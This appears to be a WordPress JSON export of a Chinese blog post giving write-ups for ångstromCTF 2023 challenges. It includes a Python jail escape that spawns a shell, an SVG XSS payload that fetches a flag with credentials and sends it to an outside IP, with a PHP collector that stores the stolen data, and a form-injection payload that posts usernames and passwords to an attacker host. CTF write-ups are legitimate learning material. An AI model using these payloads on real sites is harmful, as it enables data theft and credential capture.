{"id":1703,"date":"2023-05-01T01:27:22","date_gmt":"2023-04-30T17:27:22","guid":{"rendered":"https:\/\/fushuling.com\/?p=1703"},"modified":"2023-07-31T14:42:16","modified_gmt":"2023-07-31T06:42:16","slug":"angstromctf2023","status":"publish","type":"post","link":"https:\/\/fushuling.com\/index.php\/2023\/05\/01\/angstromctf2023\/","title":{"rendered":"\u00e5ngstromCTF2023"},"content":{"rendered":"\n
\"\"<\/div><\/figure>\n\n\n\n

\u548c\u5b66\u5f1f\u968f\u4fbf\u6253\u7740\u73a9\u513f\u6ca1\u60f3\u5230\u90fd\u80fd\u52a0\u4e86\u5feb19\u5206\u4e86\ud83e\udd23\ud83e\udd23\uff0c\u8fd9\u4e0bCountry place 18\u540d\u4e86\uff0c\u968f\u4fbf\u8bb0\u5f55\u51e0\u4e2a\u6bd4\u8d5b\u91cc\u5370\u8c61\u6bd4\u8f83\u6df1\u7684\u9898\u7684wp<\/p>\n\n\n\n

Simon says <\/h2>\n\n\n\n

\u4e00\u4e2amisc\u9898\uff0c\u5c31\u662f\u8ba9\u4f60nc\u4e4b\u540e\u4f1a\u7ed9\u4f60\u4e00\u4e2a\u53e5\u5b50\uff0c\u6bd4\u5982<\/p>\n\n\n\n

Combine the first 3 letters of lizard with the last 3 letters of lion<\/code><\/pre>\n\n\n\n
\u7136\u540e\u4f60\u5f97\u8fd4\u56de\u5b83\u524d\u4e00\u4e2a\u5355\u8bcd\u524d\u4e09\u4e2a\u5b57\u6bcd\u4ee5\u53ca\u6700\u540e\u4e00\u4e2a\u5355\u8bcd\u540e\u4e09\u4e2a\u5b57\u6bcd\uff0c\u56e0\u4e3a\u5fc5\u987b\u5728\u5f88\u77ed\u65f6\u95f4\u5185\u8fd4\u56de\uff0c\u6240\u4ee5\u5fc5\u987b\u5f97\u5199\u811a\u672c\u5b8c\u6210\uff0c\u6211\u4e4b\u524d\u5199\u7684\u811a\u672c\u662f\uff1a<\/p>\n\n\n\n
from pwn import *\n\nconn = remote('challs.actf.co', 31402)\n\n\nwhile True:\n \n    question = conn.recvline(1024).decode().strip()\n    print(\"Question:\",question)\n    \n\n    words = question.split()\n  \n    new_word = words[6][:3] + words[-1][-3:]\n    print(\"New word:\",new_word)\n   \n    conn.sendline(new_word.encode())\n\nconn.close()\n<\/code><\/pre>\n\n\n\n
\u603b\u662f\u8d85\u65f6\uff0c\u8d5b\u540e\u770b\u4e86\u522b\u4eba\u7684wp:<\/p>\n\n\n\n
#!\/usr\/bin\/env python3\nimport socket\n\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\ns.connect(('challs.actf.co', 31402))\n\nwhile True:\n    response = s.recv(1024).decode().strip()\n\n    if response.startswith(\"actf{\"):\n        print(f\"Received flag: {response}\")\n        break\n\n    words = response.split()\n    if len(words) < 7:\n        print(f\"Invalid response: {response}\")\n        break\n    answer = f\"{words[6][:3]}{words[-1][-3:]}\"\n    print(f\"Request: {response}\")\n    print(f\"Response: {answer}\")\n\n    print(\"\\n\")\n\n    s.sendall(answer.encode() + b\"\\n\")\n\ns.close()\n<\/code><\/pre>\n\n\n\n
\u867d\u7136\u6211\u611f\u89c9\u90fd\u5dee\u4e0d\u591a\uff0c\u4f46\u522b\u4eba\u8fd9\u4e2a\u5c31\u4e0d\u4f1a\u8d85\u65f6<\/p>\n\n\n\n
Obligatory<\/h2>\n\n\n\n
#!\/usr\/local\/bin\/python\ncod = input(\"sned cod: \")\n\nif any(x not in \"q(jw=_alsynxodtg)feum'zk:hivbcpr\" for x in cod):\n    print(\"bad cod\")\nelse:\n    try:\n        print(eval(cod, {\"__builtins__\": {\"__import__\": __import__}}))\n    except Exception as e:\n        print(\"oop\", e)\n<\/code><\/pre>\n\n\n\n
\u8d35\u9633\u5927\u6570\u636e\u6709\u4e2a\u9898\u5c31\u6284\u7684\u8fd9\u4e2a\uff0c\u6253\u8fd9\u4e2a\u7684\u65f6\u5019\u6ca1\u505a\u51fa\u6765\u505a\u8d35\u9633\u5927\u6570\u636e\u7684\u65f6\u5019\u4e5f\u6ca1\u505a\u51fa\u6765\uff0c\u5475\u5475\u3002<\/p>\n\n\n\n
\u8fd9\u4e2a\u9898\u5c31\u662f\u4e00\u4e2a\u7ecf\u5178\u7684pyjail\uff0c\u53ea\u4e0d\u8fc7\u505a\u4e86\u5f88\u591a\u9650\u5236\uff0c\u9996\u5148\u6709\u4e00\u4e2a\u767d\u540d\u5355\uff0c\u53ea\u80fd\u8f93\u5165q(jw=_alsynxodtg)feum’zk:hivbcpr\uff0c\u5176\u6b21\u4f7f\u7528\u4e86\u4e00\u4e2a\u81ea\u5b9a\u4e49\u5b57\u5178\uff0c\u9650\u5236\u4e86\u6211\u4eec\u53ea\u80fd\u4f7f\u7528__import__<\/p>\n\n\n\n
\u6807\u51c6\u7b54\u6848\u662f\uff1a<\/p>\n\n\n\n
(__builtins__:=__import__('os'))and((lambda:system('sh'))())<\/code><\/pre>\n\n\n\n
\u76f4\u63a5\u5c06__import__<\/code>\u51fd\u6570\u91cd\u5b9a\u4e49\u4e3aos<\/code>\u6a21\u5757\uff0c\u5e76\u6267\u884csystem('sh')<\/code>\u4ee5\u8fd0\u884c\u4e00\u4e2a\u65b0\u7684shell\u7ec8\u7aef<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
Admiral Shark<\/h2>\n\n\n\n
\u8bf4\u5b9e\u8bdd\u662f\u4e2a\u86ee\u7b80\u5355\u7684\u9898\uff0c\u4f46\u6211\u4e00\u76f4\u6ca1\u628a\u90a3\u4e2axlsx\u4fee\u590d\u51fa\u6765\ud83e\udd21\ud83e\udd21\ud83e\udd21\uff0c\u534a\u591c\u770b\u4eba\u5bb6youtube\u4e0a\u5916\u56fd\u8001\u54e5\u7ed9\u65b0\u4eba\u505a\u7684ctf\u6559\u7a0b\u624d\u641e\u6e05\u695a\u8981\u9009\u90a3\u4e2a\u4fdd\u5b58\u539f\u59cb\u6570\u636e\u518d\u4fee\u590d\u6587\u4ef6\u5934\u3002<\/p>\n\n\n\n
\u8ffd\u8e2atcp\u6d41\u53ef\u4ee5\u770b\u89c1\u4e00\u4e2a\u6d41\u91cc\u5f88\u660e\u663e\u6709xlsx\u6570\u636e<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u6211\u4ee5\u4e3a\u4fdd\u5b58\u6587\u4ef6\u76f4\u63a5\u4fdd\u5b58\u8fd9\u4e2a\u5c31\u884c\u4e86\uff0c\u6ca1\u60f3\u5230\u8981\u9009\u90a3\u4e2a\u539f\u59cb\u6570\u636e\ud83e\udd21\ud83e\udd21\uff0c\u7136\u540e\u53e6\u5b58\u5c31\u884c\u4e86<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u7136\u540e\u8865\u4e00\u4e2a50 4B 03 04\u6587\u4ef6\u5934(\u70ed\u77e5\u8bc6\uff1a010editor\u91ccctrl shift c\/v\u662f\u5bf916\u8fdb\u5236\u6570\u636e\u8fdb\u884c\u5904\u7406\uff0c\u76f4\u63a5ctrl c\/v\u662f\u5bf9\u53f3\u8fb9\u90a3\u4e2a\u89e3\u7801\u8fc7\u7684\u6570\u636e\u8fdb\u884c\u5904\u7406)<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u7136\u540e\u6253\u5f00flag.xlsx\u5373\u53ef<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
hallmark<\/h2>\n\n\n\n
\u5b66\u5f1f\u505a\u7684\uff0c\u6211\u5f53\u65f6\u6ca1\u505a\u51fa\u6765\uff0c\u6211\u5b66\u5f1f\u771f\u731b\ud83d\udc4d\ud83d\udc4d\u7b49\u7740\u4ee5\u540e\u8eba\u4e86<\/p>\n\n\n\n
\u5173\u952e\u6e90\u7801\uff1a<\/p>\n\n\n\n
app.put(\"\/card\", (req, res) => {\r\n    let { id, type, svg, content } = req.body;\r\n\r\n    if (!id || !cards[id]){\r\n        res.send(\"bad id\");\r\n        return;\r\n    }\r\n\r\n    cards[id].type = type == \"image\/svg+xml\" ? type : \"text\/plain\";\r\n    cards[id].content = type === \"image\/svg+xml\" ? IMAGES[svg || \"heart\"] : content;\r\n\r\n    res.send(\"ok\");\r\n});<\/code><\/pre>\n\n\n\n
\u7b2c\u4e00\u4e2a\u7b49\u53f7\u662f\u4e00\u4e2a\u5f31\u6bd4\u8f83\uff0c\u7b2c\u4e8c\u4e2a\u662f\u4e00\u4e2a\u5f3a\u6bd4\u8f83\uff0c\u6240\u4ee5\u6211\u4eec\u53ef\u4ee5\u4f20\u5165\u4e00\u4e2a\u6570\u7ec4\uff0c\u6bd4\u5982type[]=image\/svg+xml\uff0c\u8fd9\u6837\u6211\u4eecput\u7684\u6570\u636e\u5c31\u53ef\u4ee5\u8ba9\u7b2c\u4e00\u4e2a\u7b49\u53f7\u6210\u7acb\uff0c\u65e2\u662ftype\u5c5e\u6027\u53ef\u4ee5\u4ee5svg\u5f62\u5f0f\u89e3\u6790(\u5982\u679c\u662ftext\/plain\u5c31\u4e0d\u80fdxss\u4e86\uff0c\u76f4\u63a5\u89e3\u6790\u6210\u6587\u672c\u4e86)\uff0c\u53c8\u8ba9\u7b2c\u4e8c\u4e2a\u7b49\u53f7\u4e0d\u6210\u7acb\uff0c\u4f20\u5165\u7684content\u53ef\u63a7\uff0c\u8fd9\u6837\u6211\u4eec\u5c31\u53ef\u4ee5\u5411\u91cc\u9762\u63d2\u5165xss\u4e86\uff0c\u6700\u540e\u7684\u6570\u636e\u5305\uff1a<\/p>\n\n\n\n
type[]=image\/svg%2Bxml&id=d91ddd8a-a318-4a68-a52f-c9b2eb930192&svg=123&content=<svg version=\"1.1\" id=\"Layer_1\" xmlns=\"http:\/\/www.w3.org\/2000\/svg\" xmlns:xlink=\"http:\/\/www.w3.org\/1999\/xlink\" x=\"0px\" y=\"0px\" \t viewBox=\"0 0 864 864\" style=\"enable-background:new 0 0 864 864;\" xml:space=\"preserve\"> <style type=\"text\/css\"> \t.st0{fill:#DC1419;} <\/style> <path class=\"st0\" d=\"M766.1,257.5c-8.2-8.5-24.7-1.8-37.8-3c-0.3,0-0.9,0-1.2,0c-7.9,0.9-11.6-1.8-11.3-10.4 \tc0.6-10.7-0.3-21.6,0.3-32.3c0.3-7.3-2.4-9.5-9.5-9.1c-11.3,0.3-22.6-0.3-33.8,0.3c-6.4,0.3-8.8-2.1-8.5-8.5 \tc0.3-11.3,0-22.6,0.3-33.8c0.3-6.7-2.1-9.5-9.1-9.5c-46,0.3-92.1,0.3-137.8,0c-7.6,0-9.1,3-8.8,9.8c0.3,11.3,0,22.6,0.3,33.8 \tc0.3,6.4-1.8,8.8-8.5,8.5c-9.8-0.3-19.8,0.3-29.9-0.3s-14.9,1.8-14,13.1c0.9,9.8,0,19.8,0.3,29.9c0.3,6.7-1.8,9.8-9.1,9.5 \tc-10.7-0.6-21.6-0.6-32.3,0c-7.6,0.3-10.7-2.1-10.1-9.8c0.6-10.7,0-21.6,0.3-32.3c0.3-7.6-2.4-10.4-10.1-10.1 \tc-11.3,0.6-22.6-0.3-33.8,0c-6.4,0.3-8.8-2.1-8.8-8.5c0.3-11.6,0-23.5,0.3-35.1c0-5.5-1.8-8.2-7.6-7.9c-46.3,0-93,0.3-139.3,0 \tc-6.4,0-8.8,2.1-8.5,8.5c0.3,10.7-0.3,21.6,0.3,32.3c0.3,7.9-1.8,11.6-10.4,11c-9.5-0.6-18.9,0.6-28.4-0.3 \tc-9.8-0.9-14,1.5-13.1,12.2c0.9,9.5-0.3,18.9,0.3,28.4c0.6,8.5-1.5,12.5-11,11.9c-9.5-0.9-18.9,0.3-28.4-0.3 \tc-9.8-0.6-13.4,2.4-13.1,12.8c0.6,30.2,0.3,60.4,0.3,90.6l0,0c0,24.4,0,48.8,0,72.9c0,31.1,0,31.1,31.7,31.1 \tc20.4,0,20.4,0,20.1,20.7c0,31.1,0,31.1,30.2,31.1c3.7,0,7.3,0.3,10.7,0c8.5-0.9,10.7,2.7,10.7,11c0,13.4-6.1,32,2.7,38.4 \tc9.1,6.7,26.8,2.7,40.9,1.8c6.7-0.6,7.9,1.5,7.9,6.7c0,9.1,0,18,0,27.1c0,18.9,0,18.9,18.3,18.9c33.8,0,33.8,0,33.5,34.2 \tc-0.3,18-3,18,16.8,18c34.8,0,35.4,0.3,34.8,35.1c-0.3,13.4,3,18.3,17.1,17.1c11.6-1.2,27.1-5.2,33.8,2.1c5.8,6.1,2.7,21.6,1.5,32.6 \tc-1.5,13.7,2.7,18.6,16.8,16.8c11-1.5,25.9,3.4,32.6-2.1c7.9-6.7,3-22,2.4-33.5c-0.6-12.8,2.7-17.7,16.5-16.5 \tc11,1.2,25.6,4,32.6-1.5c8.5-6.7,3.4-22,2.7-33.2c-0.6-13.4,3.4-18,17.1-17.1c11,0.9,25.3,5.2,32.6-1.8c7.3-7,2.1-21.3,2.4-32.3 \tc0.6-17.7,0.3-17.7,18.6-17.4c5.5,0,11-0.6,16.2,0.3c13.1,1.8,18-2.4,17.4-16.8c-1.5-35.4-0.6-36,35.4-35.1 \tc13.1,0.3,18.3-2.4,16.8-16.8c-1.2-11-5.2-25.3,1.8-32.6c7-7.6,21.3-1.5,32.3-2.4c1.2,0,2.7-0.3,4,0c11.3,2.1,13.4-3.4,13.1-13.4 \tc-0.3-12.2-5.2-27.4,1.8-35.4c7.9-8.5,23.8-2.7,36-2.7c11,0,14.6-2.7,14.3-14c-0.6-51.5,0-102.8-0.3-154.3 \tC768.2,281.6,773.4,265.4,766.1,257.5z M301.1,297.4c0.3,7-2.7,9.5-9.5,9.1c-9.8-0.3-19.8,0.3-29.9-0.3c-9.8-0.6-13.7,2.4-13.1,12.8 \tc0.9,11.3,0.3,22.6,0.3,33.8c0,10.7,0,21.6,0,32.3l0,0c0,22.6-0.3,45.1,0,67.7c0,7-1.8,9.8-9.1,9.1c-11.3-0.6-22.6-0.6-33.8,0 \tc-7.6,0.3-8.8-2.7-8.8-9.5c0.3-45.4,0.3-91.2,0-136.6c0-7.9,2.4-10.7,10.1-10.1c8.5,0.6,17.1,0,25.6,1.5c11.6,2.1,15.9-3,16.2-13.1 \tc0.3-10.4,0.3-20.7,0-31.1c-0.3-6.7,2.1-9.1,8.5-8.5c0.9,0,1.8,0,2.7,0C312.7,256.3,299.2,243.8,301.1,297.4z\"\/>\r\n <script>\r\nwindow.onload = function(){\r\n    fetch('https:\/\/hallmark.web.actf.co\/flag',{   credentials: 'include' }).then(response => response.text()).then(data => window.location.href=\"http:\/\/121.36.193.62\/xml.php?1=\"%2Bdata);\r\n    \r\n}\r\n<\/script> <\/svg>\r<\/code><\/pre>\n\n\n\n
\u6211\u5728\u81ea\u5df1vps\u4e0a\u8d77\u4e86\u4e00\u4e2axml.php<\/p>\n\n\n\n
<?php\n$content = $_GET['1'];\nif(isset($content)){\n    file_put_contents('flag.txt','Last update time:'.date(\"Y-m-d H:i:s\").\"\\n\".$content);\n}else{\n    echo 'no data input';\n}<\/code><\/pre>\n\n\n\n
\u751f\u6210\u94fe\u63a5\u540e\u7528admin bot\u70b9\u51fb\u6076\u610f\u94fe\u63a5\uff0c\u7136\u540e\u8bbf\u95eeflag.txt\u5373\u53ef<\/p>\n\n\n\n
Brokenlogin<\/h2>\n\n\n\n
\u6ce8\u5165\u8868\u5355<\/p>\n\n\n\n
https:\/\/brokenlogin.web.actf.co\/?message={{request.args|safe}}&r=<form action=\"http:\/\/vps\/\" method=\"POST\"><label for=\"username\">Username: <\/label><input id=\"username\" type=\"text\" name=\"username\" \/><br \/><br \/><label for=\"password\">Password: <\/label><input id=\"password\" type=\"password\" name=\"password\" \/><br \/><br \/><input type=\"submit\" \/><\/form><!-<\/code><\/pre>\n\n\n\n
https://brokenlogin.web.actf.co\/?message={{request.args|safe}}&r=%3Cform%20action=%22http:\/\/vps\/%22%20method=%22POST%22%3E%3Clabel%20for=%22username%22%3EUsername:%20%3C\/label%3E%3Cinput%20id=%22username%22%20type=%22text%22%20name=%22username%22%20\/%3E%3Cbr%20\/%3E%3Cbr%20\/%3E%3Clabel%20for=%22password%22%3EPassword:%20%3C\/label%3E%3Cinput%20id=%22password%22%20type=%22password%22%20name=%22password%22%20\/%3E%3Cbr%20\/%3E%3Cbr%20\/%3E%3Cinput%20type=%22submit%22%20\/%3E%3C\/form%3E%3C!-<\/code><\/pre>\n","protected":false},"excerpt":{"rendered":"
\u548c\u5b66\u5f1f\u968f\u4fbf\u6253\u7740\u73a9\u513f\u6ca1\u60f3\u5230\u90fd\u80fd\u52a0\u4e86\u5feb19\u5206\u4e86\ud83e\udd23\ud83e\udd23\uff0c\u8fd9\u4e0bCountry place 18\u540d\u4e86\uff0c\u968f\u4fbf\u8bb0\u5f55\u51e0\u4e2a\u6bd4\u8d5b\u91cc\u5370 […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[9],"tags":[],"class_list":["post-1703","post","type-post","status-publish","format-standard","hentry","category-wp"],"_links":{"self":[{"href":"https:\/\/fushuling.com\/index.php\/wp-json\/wp\/v2\/posts\/1703","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/fushuling.com\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/fushuling.com\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/fushuling.com\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/fushuling.com\/index.php\/wp-json\/wp\/v2\/comments?post=1703"}],"version-history":[{"count":3,"href":"https:\/\/fushuling.com\/index.php\/wp-json\/wp\/v2\/posts\/1703\/revisions"}],"predecessor-version":[{"id":1715,"href":"https:\/\/fushuling.com\/index.php\/wp-json\/wp\/v2\/posts\/1703\/revisions\/1715"}],"wp:attachment":[{"href":"https:\/\/fushuling.com\/index.php\/wp-json\/wp\/v2\/media?parent=1703"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/fushuling.com\/index.php\/wp-json\/wp\/v2\/categories?post=1703"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/fushuling.com\/index.php\/wp-json\/wp\/v2\/tags?post=1703"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}